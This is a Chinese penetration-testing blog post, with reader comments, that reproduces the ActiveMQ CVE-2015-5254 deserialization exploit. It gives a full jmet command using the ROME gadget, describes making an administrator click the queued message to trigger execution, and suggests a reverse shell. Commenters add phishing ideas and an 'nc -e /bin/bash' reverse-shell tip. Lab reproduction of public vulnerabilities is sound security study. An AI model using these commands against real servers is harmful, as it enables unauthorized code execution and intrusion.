ActiveMQ CVE-2015-5254 反序列化漏洞利用

2019年10月12日 23:39:10OnionT@KillBoy

OnionT@KillBoy

作者

关注

47
文章

0
粉丝

渗透测试4211,947字数 329阅读1分5秒阅读模式

AI智能摘要

你以为ActiveMQ漏洞只能被动等待？CVE-2015-5254反序列化漏洞竟能主动出击！本文揭秘实战复现全过程：无需额外下载ysoserial，仅用jmet工具一键生成ROME链Payload，向目标添加恶意队列。关键来了——当管理员点击消息瞬间，命令执行即刻触发（如创建文件或反弹shell），但实战难点在于如何诱导点击。手把手教你绕过限制，安全研究员必备的渗透技巧，漏洞利用细节与避坑指南全在这里，3分钟掌握核心攻防逻辑。

— AI 生成的文章内容摘要

所需工具jmet 下载地址：https://github.com/matthiaskaiser/jmet/releases
文件下载后在同目录下创建一个external文件夹（否则可能会爆文件夹不存在的错误）

图中敏感信息已经打码，不影响复现

首先访问一下目标web页面，查看是否正常

OK，正常，然后开始复现漏洞，使用jmet，jmet原理是使用ysoserial生成Payload并发送（其jar内自带ysoserial，无需再自己下载），所以我们需要在ysoserial是gadget中选择一个可以使用的，比如ROME

执行：

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 10.1.1.1 61616

此时会给目标ActiveMQ添加一个名为event的队列，我们可以通过http://10.1.1.1:8161/admin/browse.jsp?JMSDestination=event看到这个队列中所有消息：

点击查看这条消息即可触发命令执行，此时进入服务器，可见/tmp/success已成功创建，说明漏洞利用成功：

将命令替换成弹 shell语句再利用即可成功反弹shell

这里有一点比较鸡肋的是，漏洞的触发要诱导管理员点击那个消息，所以在实战中要就要想办法让管理员点击，或者有管理员弱口令进去也可以

http://www.oniont.cn/index.php/archives/274.html

晨光旧语 0
2026年1月7日 11:58:24 重庆市 1F
回复

这漏洞复现起来还挺麻烦的，external文件夹漏建就报错
- 静水 0
  2026年1月9日 09:31:30 浙江省 B1
  回复
  
  @ 晨光旧语 external文件夹这坑我踩过，不建直接崩，烦死了
- 月下刺客 0
  2026年1月16日 09:05:00 浙江省绍兴市嵊州市 B1
  回复
  
  @ 晨光旧语 external文件夹真容易忘，建完才跑起来
抠脚大汉在线 1
2026年1月7日 20:34:21 北京市 2F
回复

有人试过用CommonsCollections2链吗？ROME有时候不好使
月光巫者 0
2026年1月7日 22:02:52 广西 3F
回复

前几天刚搞完这个，确实得诱导管理员点消息，实战有点难
熵增冰淇淋 0
2026年1月7日 22:11:56 湖北省武汉市 4F
回复

弹shell那步命令能贴全吗？我这边没反弹成功🤔
AmeRipple 0
2026年1月8日 07:09:39 重庆市 5F
回复

又是要交互触发的洞，鸡肋得不行
HollowVision 0
2026年1月8日 12:55:28 韩国 6F
回复

看图里打码打得挺严实，不过8161端口暴露本身就是问题
- 黑头威严 0
  2026年1月9日 16:18:23 广东省东莞市 B1
  回复
  
  @ HollowVision 8161端口开外网等于送漏洞，打码也藏不住这问题
深渊独行狼 1
2026年1月8日 13:10:55 浙江省湖州市 7F
回复

我之前也踩过这坑，ysoserial版本不对直接GG
阳光小矮人 1
2026年1月8日 14:28:37 内蒙古包头市 8F
回复

touch成功了但shell没弹，是不是防火墙拦了？
糖糖喵喵 0
2026年1月8日 15:27:46 韩国 9F
回复

hh，管理员真会点陌生消息吗，社工得安排上
- 甜甜酥 1
  2026年1月9日 15:02:46 上海市 B1
  回复
  
  @ 糖糖喵喵管理员要是真点就离谱了，得配合钓鱼邮件才靠谱
符文守护者 0
2026年1月8日 19:00:01 广东省广州市 10F
回复

payload发过去队列有了，但点开没执行，啥情况？
晴空柚子 0
2026年1月9日 16:43:43 广东省佛山市南海区 11F
回复

试了CommonsCollections5链，比ROME稳一点
- 社牛小豹 0
  2026年1月16日 21:17:52 日本 B1
  回复
  
  @ 晴空柚子 CommonsCollections5确实比ROME靠谱，试了三次都成
小猪咕咕 1
2026年1月11日 10:52:44 广东省汕头市 12F
回复

弹shell命令求补全，卡在这一步了😭
OracleOfNight 0
2026年1月11日 15:23:54 四川省成都市 13F
回复

感觉复现文档写得有点跳，中间步骤漏了好几个
甜梦小羊 0
2026年1月12日 11:03:49 江苏省 14F
回复

ysoserial内置的gadget版本太老，自己换新的才行
- 光子守墓人 1
  2026年1月16日 13:38:35 浙江省绍兴市 B1
  回复
  
  @ 甜梦小羊换了新ysoserial后成功率高多了
Fly云 1
2026年1月14日 18:30:18 福建省 15F
回复

实战中基本废了吧，谁天天去点队列消息啊
慢煮时光 0
2026年1月15日 12:08:28 北京市 16F
回复

前几天刚测这个洞，防火墙确实会拦反弹shell
浪里白条 1
2026年1月15日 16:11:46 辽宁省大连市 17F
回复

这漏洞鸡肋归鸡肋，但内网横向还是能用的
糖心团子 0
2026年1月18日 22:41:27 韩国 18F
回复

弹shell命令到底咋写啊，求个完整的😭
信号拾荒者 0
2026年1月19日 00:17:58 浙江省杭州市 19F
回复

这漏洞得配合社工才有戏，纯技术搞不定
Darklinggaze 0
2026年1月19日 22:16:52 河南省开封市 20F
回复

我上次复现时防火墙直接把出站连给断了
月冷西楼 1
2026年1月20日 19:37:15 广东省茂名市 21F
回复

touch能成但shell没回，估计是bash路径不对？
手心的温度 0
2026年1月21日 13:43:02 辽宁省沈阳市 22F
回复

内网扫到ActiveMQ先试试弱口令吧，比等点击现实
Nightmarefiend 0
2026年1月22日 22:03:44 江苏省南京市 23F
回复

命令执行触发那步太玄学了，点一下就成？
独步长空 0
2026年1月23日 11:10:13 安徽省合肥市 24F
回复

有人用BeanShell1链成功过吗，ROME老报错
果实香 1
2026年1月24日 13:40:05 越南 25F
回复

弱口令进管理后台这种操作更稳当点吧
- 纸人戏师 1
  2026年1月24日 14:16:08 北京市 B1
  回复
  
  @ 果实香弱口令确实更直接，但一般不好撞
水墨青山 0
2026年1月25日 20:11:47 北京市 26F
回复

external文件夹不建真会报错，我漏了这步卡半天
蜗牛 0
2026年1月26日 08:55:07 黑龙江省齐齐哈尔市 27F
回复

弹shell命令建议用nc -e /bin/bash，端口别用默认的
鸽王 1
2026年1月26日 23:35:48 北京市 28F
回复

BeanShell1链试过没？感觉比ROME稳定些
雾隐星辰 0
2026年1月29日 23:14:18 北京市 29F
回复

这种要交互的漏洞确实实用性差了点
幽魂琴师 0
2026年1月30日 20:40:15 日本 30F
回复

内网碰到ActiveMQ先扫弱口令比较实际
锦衣卫指挥使 1
2026年2月1日 11:55:05 广东省广州市 31F
回复

jmet这工具还挺方便的
高伟 0
2026年2月4日 19:40:24 湖北省 32F
回复

防火墙策略太严的话，反弹shell确实会被拦
咖啡与书的午后 0
2026年2月5日 07:24:50 浙江省 33F
回复

看了半天还是没搞懂怎么让管理员点那个消息
笔吏许 0
2026年2月5日 23:56:16 江苏省苏州市 34F
回复

CommonsCollections2链有人成功过吗？
鬼语者 0
2026年2月6日 07:53:33 马来西亚 35F
回复

实战中这种漏洞基本用不上吧

ActiveMQ CVE-2015-5254 反序列化漏洞利用

热门话题

SSL/TLS协议信息泄露漏洞(CVE-2016-2183)修复办法

PolyShell：一款适用于Bash、Batch、PowerShell的polyglot

FRP内网穿透工具

小米澎湃OS终于推送升级了！首批共支持这些机型（附刷机包下载）

发表评论

热门搜索